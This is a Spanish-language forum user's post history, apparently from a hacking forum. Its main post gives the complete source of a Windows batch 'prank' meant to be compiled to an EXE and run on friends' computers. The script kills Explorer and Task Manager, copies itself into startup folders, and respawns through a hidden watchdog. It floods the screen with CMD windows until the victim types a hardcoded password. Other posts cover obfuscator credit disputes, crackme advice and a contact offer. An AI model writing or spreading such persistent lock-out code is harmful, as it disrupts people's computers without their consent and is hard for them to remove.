Mensajes

Jajaja, es una pérdida de tiempo, pero lo hice para joder a amigos que no entienden nada y no olvidarme de Batch que aunque sea malo, siempre está piola saber otro lenguaje
Lo publico acá por si alguien quiere perder el tiempo con algo de ese estilo.

[Hola foro!]

Hola foro!PRIMERO QUE NADA, quiero decir que esto no es como los típicos batch que eliminan la System32 y listo, porque primero, eso lo detecta hasta el antivirus más malo, y esto al ser algo ¿nuevo? no lo detecta. Y tampoco es un tipo de esas bromas con MSGBox, esto es algo que si se pudiera trabajar más en un lenguaje más avanzado (ya que se que en batch no se pueden hacer muchas cosas) podría llegar a ser algo muy poderoso.



El script lo podes encontrar en mi GitHub y acá abajo voy a dejar el SRC también.
De paso, si quieren cambiarle el nombre al archivo, necesitan hacer varias cosas.
Una de ellas es primero que nada cambiar todo lo que diga "MCRegedits.exe" a "NombreDeTuArchivo.exe", ya que no es algo automatizado (aunque si quieren puedo crear otro batch para automatizar esto.)
Además tienen que pasar su archivo a .EXE mediante Bat2Exe (creo que es la mejor opción)
De paso, al convertirlo a Bat2Exe (obligatorio, si no no funciona "CIF") hay algunos problemas, pero no importa.

Paso a explicar mi script.
El script lo que hace es:
Al iniciarlo primero que nada cierra explorer.exe y taskmgr.exe para que no se pueda abrir casi nada, crea los archivos: CIF y MOLESTO con nombres random

Código [Seleccionar] Expandir

SET molestorndm=%RANDOM%XXXXMadeByTinoXXXX%RANDOM%HGJT4VY3%RANDOM%%RANDOM%5BBBS%RANDOM%FV%RANDOM%XX%RANDOM%XDFT%RANDOM%BT6432C%RANDOM%FAVV%RANDOM%fsos%RANDOM%34B34B%RANDOM%DAD%RANDOM%%RANDOM%FDDD%RANDOM%FFD%RANDOM%
Luego empieza a pedirles que inicien sesión con una contraseña de lo contrario no van a poder cerrar el programa.
Si lo cierran, esta "CIF" que checkea todo el tiempo si MCRegedits.exe está abierto y si no lo está, lo abre.
Crea cada 4 pings al localhost otra ventana CMD la cual empieza a molestar diciendo que inicie sesión, así que si está jugando a un juego en fullscreen etc, lo va a sacar, etc...
Si escriben la contraseña incorrecta, empiezan a abrirse más screens CMD de "MOLESTO".
Y lo más importante y es en lo que me centré es que si la persona que lo abre no entiende mucho o  no tiene ni idea donde se puede esconder el programa etc, no lo va a poder eliminar. La única forma es entrando en modo seguro y eliminando MCRegedits.exe en "shell:startup" y "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" o usando un script que también cree por las dudas de que sin querer como una persona que le faltan varios jugadores lo abra (mi caso) cree un "antidoto" que elimina la mayoría de los archivos y deja la computadora utilizable.
Si no me falta alguna otra cosa de poca importancia, ahí esta lo que hace un simple batch, sin eliminar nada, molestar.



Si van a compartirlo por favor, dejen créditos con un simple link a mi perfil o una mención, me haría feliz ya que esta ***** me saco tiempo de mi vida en lo cual podría haber gastado haciendo algo más importante, jeje. De paso, para algunos que digan que se puede encontrar en otros lados y que me copio de alguien o que si hay metodos de resolución en Google etc... Chupenme bien la pija esto está hecho todo a mano sin ningún programa (excepto Bat2Exe) y lo único que saqué de Google ya que no me acordaba fue esto:

Código [Seleccionar] Expandir

tasklist /FI "IMAGENAME eq MCRegedits.exe" /FO CSV > mcregedits.lmao
FOR /F %%A IN (mcregedits.lmao) DO IF %%~zA EQU 0 GOTO end la saque de Stackoverflow donde los gringuitos comparten su info.

Código [Seleccionar] Expandir

echo off
cls
:: EMPIEZA LA MAGIA (SCRIPTS PARA PERSISTENCIA)
SET molestorndm=%RANDOM%XXXXMadeByTinoXXXX%RANDOM%HGJT4VY3%RANDOM%%RANDOM%5BBBS%RANDOM%FV%RANDOM%XX%RANDOM%XDFT%RANDOM%BT6432C%RANDOM%FAVV%RANDOM%fsos%RANDOM%34B34B%RANDOM%DAD%RANDOM%%RANDOM%FDDD%RANDOM%FFD%RANDOM%
echo off
cls
echo :s >> %temp%\mss.bat >> %molestorndm%.bat
echo echo echo off >> %temp%\mss.bat >> %molestorndm%.bat
echo echo cls >> %temp%\mss.bat
echo echo echo INICIA SESI¢N >> %temp%\mss.bat >> %molestorndm%.bat
echo echo title INICIA SESI¢N >> %temp%\mss.bat >> %molestorndm%.bat
echo echo ping localhost -n 2 >nul >> %temp%\mss.bat >> %molestorndm%.bat
echo echo exit >> %temp%\mss.bat >> %molestorndm%.bat
echo start %temp%\mss.bat >> %molestorndm%.bat
echo ping localhost -n 4 >nul >> %molestorndm%.bat
echo goto s >> %molestorndm%.bat
start /min %temp%\%molestorndm%.bat
::::::::::::::::::::::::::::::::
:: PERSISTANCE AFTER SHUTDOWN ::
::::::::::::::::::::::::::::::::
copy MCRegedits.exe %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup
copy MCRegedits.exe C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
:::::::::
:: CIF ::
:::::::::
copy MCRegedits.exe %temp%
SET cifrandom=%random%MadeByTino%random%FF%random%FRV%random%ERVWZ%random%TYN%random%456VVV%random%ZZZEZ%random%VKJVEJJV%random%LDKIADI%random%DJDHE4H%random%3458347%random%73626%random%7235452%random%U345FCNC3%random%757HC32V23JVJ%random%U43VH23%random%
echo :cif >> %temp%\%cifrandom%.bat
echo taskkill /f /im "explorer.exe" >> %temp%\%cifrandom%.bat
echo taskkill /f /im "taskmgr.exe" >> %temp%\%cifrandom%.bat
echo echo off >> %temp%\%cifrandom%.bat
echo tasklist /FI "IMAGENAME eq MCRegedits.exe" /FO CSV > mcregedits.lmao >> %temp%\%cifrandom%.bat
echo FOR /F %%A IN (mcregedits.lmao) DO IF %%~zA EQU 0 GOTO end >> %temp%\%cifrandom%.bat
echo start MCRegedits.exe >> %temp%\%cifrandom%.bat
echo goto cif >> %temp%\%cifrandom%.bat
echo :end >> %temp%\%cifrandom%.bat
echo del mcregedits.lmao >> %temp%\%cifrandom%.bat
echo goto cif >> %temp%\%cifrandom%.bat
start /min %temp%\%cifrandom%.bat

:start
start /min %temp%\%cifrandom%.bat
start /min %temp%\%molestorndm%.bat
cls
color f0
echo ^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=
echo            Al parecer necesitas iniciar sesi¢n
echo             Usa la contrase¤a que te han dado.
echo.
echo         Si reinicias la PC o cierras el programa
echo                 va a aparecer de nuevo
echo                  Script made by Tino
echo ^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=
SET /P psw=Ingresa la contrase¤a:
IF %psw%==tino777 goto :done
) ELSE (
goto :nope

:done
cls
echo Contrase¤a correcta!
echo Felicidades.
cd %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup
del MCRegedits.exe
cd %temp%
del MCRegedits.exe
cd C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
del MCRegedits.exe
taskkill /f /im "cmd.exe"
taskkill /f /im "MCRegedits.exe"
pause
exit

:nope
cls
echo Contrase¤a incorrecta!
echo Intentalo de nuevo
echo Mientras mas contrase¤as incorrectas, mas mensajes!
echo.
echo Presione cualquier tecla para volver al inicio
pause >nul
start %temp%\%molestorndm%.bat
goto :start
pause

[NO]

Hola! Como dijo tincopasan, eliges un lenguaje de programación, buscas cursos (recomiendo cursos GRATIS de YT o cualquier plataforma para empezar) y creas tu primer Script.
NO te recomiendo usar el lenguaje Batch, ya que yo gaste 3 años aprendiéndolo y no te sirve para casi nada, ya que con Python, PowerShell o Perl por ejemplo se pueden hacer 5 veces más cosas que con Batch, un saludo!

Modificado por Aincrad? Quien sos? JJAJAJA, como si lo hubieses modificado tú...

Como que nunca te gusta poner el código fuente de lo que te robas!

Si supieras leer, podrías ver claramente el post dice que es una recopilación y que el código original se encuentra en www.angelsresist.com/obfuscator.shtml pero como a ti siempre se te ocurre buscarle lo "malo a las cosas" intentas dejar mal a la gente de ElHacker, la verdad, que buen usuario, ¿no?, me tomé la molestia de hostearlo en mi página web (también aclarado en el post que está hosteado en 000webhost)  buscando errores de por qué no funcionaba cuando metía el obfuser.js javascript.js e index.html después de también tomarme el tiempo de traducir todo o casi todo, e intentar dejarlo más lindo de lo que estaba...
¿A demás no se que le ves de malo? Si en el post está aclarado.
¡Un saludo! A ver si tenes algún argumento...

[editado]

No se de que te quejas, si tu tampoco añadiste los créditos.

lo subes como si fuera creado por ti , ni pones lo créditos .

Además, pongo como hosteado y editado, ya que tiene unas pequeñas modificaciones HECHAS por MÍ.
NUNCA, pero NUNCA, podrás ver en la página de BatchObfuser de www.pepinoarmy.win algo que diga "código by MI NOMBRE" no como en tu caso: https://batch-ofuser-by-aincrad.000webhostapp.com
Antes de criticar a los demás, fíjate en ti.
Igual tranquilo, gracias por hacerme acordar de poner los créditos.
Un saludo, Tino  .

Muchas gracias por la ayuda!

[HOLA FORO!]

HOLA FORO!
Buenas! Tengo tres preguntas, soy MUY NUEVO en esto de la Ingeniería Inversa y estoy llevando por ahora el curso de karmany del 2008 por ahí, la y la verdad, no se si estaría desactualizado, o haya otros mejores?
La tercera pregunta, es si me recomendar un crackme o algo para practicar, que sea MUY fácil, ya que con suerte pase el crackme Renascense (de nivel 1) y la mayoría que hay de nivel 0-1 en la lista de los crackmes están desactualizados.

Un saludo
~ Tino.

Ahí te mande mensajes, nos contactamos por ahí, un saludo!

[APORTE]

HOLA FORO!  
Les traigo un APORTE ¡Para que ofusquen sus HTML desde una página web!
La página esta moderada por mi e intento de RECOPILAR todos los ofuscadores! Para que no tengan que andar buscando en Google algunos que quizás ni siquiera sirvan.
Así que, para ayudarlos a ustedes, les traigo un ofuscador web que funciona y siempre va a estar activo hasta aproximadamente dentro de 6/7 meses, luego va a cambiar de dominio y  va a seguir activo por 1 año más!


LINK: www.pepinoarmy.win


Recalco, es una recopilación de ofuscadores, EL CÓDIGO DEL OFUSCADOR NO ES MIO, para ver el original entra en www.angelsresist.com/obfuscator.shtml

¡Hola! Tengo 3 años de experiencia en batch, y te quiero ayudar a hacer el login, pero me queda más cómodo hablar por chat, si queres mi ayuda: Tino#1531 en Discord